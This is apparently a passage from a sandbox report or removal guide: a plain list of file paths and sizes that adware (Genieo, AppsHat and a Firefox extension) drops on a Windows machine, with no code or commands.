      C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\extensionData\plugins\263.js (5 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\extensionData\plugins\72.js (1601 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\chrome\content\api\911be52d07701495078e83a9206b167f.js (6 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\chrome\content\core\17f548e3cc7f3ff5ea90135d36d5617d.js (804 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\extensionData\plugins\9.js (6 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\chrome\content\core\04e8dd99d8507cb819f5842891bb38e1.js (7 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\skin\skin.css (909 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\chrome\content\core\8d67ab46bd5bcae77c6c6b11b5654720.js (22 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\extensionData\plugins\22.js (21 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\extensionData\plugins\301.js (5 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\chrome\content\ddf2e4e66be71a3aa501f0f1d81c9768.js (26 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\chrome\content\ffCoreFilesIndex.txt (5 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\extensionData\plugins\262.js (5 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\skin\button5.png (5 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\chrome\content\core\d2eb933c47d0580044f729e920ee557c.js (20 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\extensionData\plugins\281.js (489 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\extensionData\plugins\183.js (6 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\extensionData\userCode\extension.js (358 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\extensionData\plugins\184.js (5 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\extensionData\plugins\182.js (30 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\extensionData\plugins\253.js (741 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\chrome\content\options.js (5 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\skin\panelarrow-up.png (921 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\extensionData\plugins\180.js (5 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\skin\button2.png (5 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\skin\button3.png (5 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\chrome\content\core\527da7a7cda8dba99ce791702fd18eae.js (6 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\chrome\content\api\cb61f016464902e3e7abde750ef80ba6.js (7 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\chrome\content\core\6e6d2fa3e2de0ad6f80c88dde043160a.js (5 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\extensionData\plugins\345.js (611 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\skin\button4.png (5 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\chrome\content\core\a5d8eadabd69a1a5fd8936768f25760f.js (5 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\chrome\content\browser.xul (13 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\extensionData\plugins\21.js (7 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\extensionData\plugins\195.js (414 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\chrome\content\api\407fbe3700b14ae5bb1391d614260019.js (5 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\extensionData\plugins\220.js (1592 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\extensionData\plugins\13.js (14 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\chrome\content\api\b2e7327e3ac0e48bdfe0f2ee52c9bfcf.js (5 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\extensionData\plugins\223.js (829 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\chrome\content\core\c61ce4124d823fd35688eed80827a81c.js (6 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\extensionData\plugins\104.js (5 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\extensionData\plugins\177.js (816 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\chrome\content\api\872632d4dba5c171e72a42614d2bf42b.js (13 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\chrome\content\6f853c3a67c26281e0f08b3f48ebe9f2.js (804 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\chrome\content\core\7b5b2cd1ed885911b763748de0e62fac.js (134 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\chrome\content\core\b9f5ee3c3d06e3f31441702c458c077e.js (5 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\chrome\content\api\5f811dd3d0ee0431837525a50e825c15.js (22 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\extensionData\plugins\14.js (808 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\extensionData\plugins.json (23 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\chrome\content\api\f4df6139b485e8441ead85439d9b0e50.js (964 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\extensionData\plugins\16.js (804 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\chrome\content\api\adef4cf34f09c97ddf05ee0f7b152b30.js (947 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\defaults\preferences\prefs.js (13 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\chrome\content\9774056cfe57a06b996430a878d9f2bd.js (804 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\extensionData\plugins\200.js (813 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\chrome\content\api\f183a1c9337b10ab3663860e202a82b3.js (20 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\extensionData\plugins\207.js (5 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\chrome\content\core\97f2d9400f4f41e0a004435861570a3b.js (5 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\extensionData\plugins\102.js (5 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\chrome\content\core\0cb63f7cf6b8159c4f9788d9ed18275e.js (5 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\chrome\content\core\2b28a69712a27f77ea83be613b1b130b.js (7 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\extensionData\plugins\246.js (20 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\extensionData\plugins\242.js (5 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\chrome\content\api\651148047984925c52db469330db90bf.js (13 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\extensionData\plugins\91.js (6772 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\skin\popup.html (353 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\skin\icon16.png (5 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\chrome\content\core\96535ae26022e95205336b6fd0dfa30b.js (12 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\chrome\content\core\40fbad884e8b31bac377f4b3b4234a30.js (5 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\chrome\content\6acae8acaae3dc3de618c70dcea92ac0.js (618 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\extensionData\plugins\252.js (5 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\extensionData\plugins\64.js (6 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\extensionData\plugins\4.js (3410 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\extensionData\manifest.xml (5 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\extensionData\plugins\78.js (7 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\extensionData\plugins\47.js (15 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\chrome\content\core\c262c0e9c94427dc9ed88ee28c1a65df.js (7 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\chrome\content\options.xul (5 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\extensionData\plugins\28.js (540 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\skin\update.css (144 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\locale\en-US\translations.dtd (429 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\chrome\content\core\589ae49080bbcf5ef005df42c5431597.js (6 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\chrome\content\c11ef8a5aa8ffdad3fc716ad6936ea56.js (6 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\extensionData\plugins\98.js (5 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\chrome\content\search_dialog.xul (6 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\chrome.manifest (634 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\extensionData\plugins\7.js (689 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\chrome\content\background.html (6 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\chrome\content\api\ebfd80fa6c60ea67c1d52c5d9ab644bf.js (357 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\chrome\content\api\c0199a124990378c5a0d61a8fe029843.js (14 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\extensionData\userCode\background.js (640 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\chrome\content\api\4d651c7925db39b85b6a733479754503.js (6 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\chrome\content\dialog.js (5 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\chrome\content\api\03afa64119f70e1aebbe898c1b5da437.js (5 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\skin\icon128.png (804 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\chrome\content\core\installer.js (10 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\skin\icon48.png (8 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\chrome\content\bf8b21d3242abeb0ac0b4bad994e9dad.js (651 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\extensionData\plugins\17.js (2473 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\P5Y5B9WWJJJ5HVQUNP5Q.temp (196 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\KAWX3NZ41ZYMD0YSFS9E.temp (196 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\49RJHLBJDH30A4KJTGPP.temp (196 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nspF4EB.tmp\inetc.dll (808 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsaF4DB.tmp (10027 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\AppsHat Mobile Apps\Uninstall.exe (164 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nspF4EB.tmp\appshat.exe (13188 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nspF4EB.tmp\System.dll (23 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nspF4EB.tmp\webplayer_installer.exe (8184 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Data\log\gentray.log (7783 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\cmd_close.gif (840 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\js\partnerConfig.js (937 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\tray\2_collecting.png (15 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\tray\1_downloading.png (15 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\js\partnerConfig.js (937 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\notification_disabled_nav_prev.png (164 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\icon-16-disabled.png (646 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\sensor-enable.ico (1 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002_old\text (4 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\tray\down1.ico (1 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\collapse.png (2 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\notification_enabled_nav_next.png (150 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\uninstall\gim394750002\genuninstallui.exe (1856 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\uninstall\genuninstallui.exe (1856 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\text\LicenseAgreement.txt (784 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\tray\down1.ico (1 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\tray\tray_awaitingMessage.ico (1 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\conf\partner.properties (11 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\firefox-bar-24.png (727 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\install_icon.ico (4 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\tray\down2.ico (1 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\tray\complete.png (15 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\notification_rgn_image.bmp (3616 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\tray\prep_env_err.png (784 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsvDA79.tmp\fct.dll (12 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\disable-transition-2.ico (1 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\text\text.properties (2 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsvDA79.tmp\KillProcDLL.dll (816 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\GenericApp.icns (4992 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\icon-16-enabled.png (537 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo_old\img\tray (4 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\tray\prep_env.png (14 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\tray\down3.ico (1 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\desktop.ico (784 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\enabled_nav_next.gif (847 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\css\partner.css (1 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\disabled_nav_prev.gif (853 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\tray\tray_normal.ico (1 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\notification_enabled_nav_prev.gif (853 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\sensor-disabled_18px.png (914 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\cmd_close.png (155 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\genieo-16icon-browser-disabled.ico (1 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\tray\2_collecting.png (15 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\redHome.png (8 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\uninstall\gim394750002\partner_uninstall.exe (1552 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\icon-16-disabled.png (646 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\notification_enabled_nav_next.gif (847 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\tray\down3.ico (1 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\objectivehot_disabled_nav_prev.gif (853 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\text\en_text.properties (1 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\objectivehot_enabled_nav_prev.png (153 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\notification_disabled_nav_next.png (161 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\bin\license.exe (2392 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\tray\network_retry.png (15 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\hide_notfication_seperator.png (281 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\expand.png (2 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\css\partner.css (1 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\text\LicenseAgreement.txt (784 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\tray\uac_retry.png (15 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\objectivehot_enabled_nav_next.gif (847 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002_old\img\tray (4 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\firefox-bar-16.png (586 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\enabled_nav_prev.gif (853 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\sensor-enabled_18px.png (821 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\tray\down2.ico (1 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\sensor-disabled_18px.png (914 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\tray\3_mapping.png (14 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\favicon.ico (5 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\sensor-enable.ico (1 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\notification_enabled_nav_prev.png (153 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\GenericApp.icns (4992 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\objectivehot_disabled_nav_next.gif (855 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\install_icon.ico (4 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\favicon.ico (5 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\tray\complete.png (9 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\disable-transition-2.ico (1 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\disabled_nav_next.gif (855 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\conf\partnerBannedList.dat (66 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\conf\partnerBannedList.dat (66 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\objectivehot_disabled_nav_next.png (161 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\objectivehot_enabled_nav_prev.gif (853 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\tray\off.ico (1 bytes)
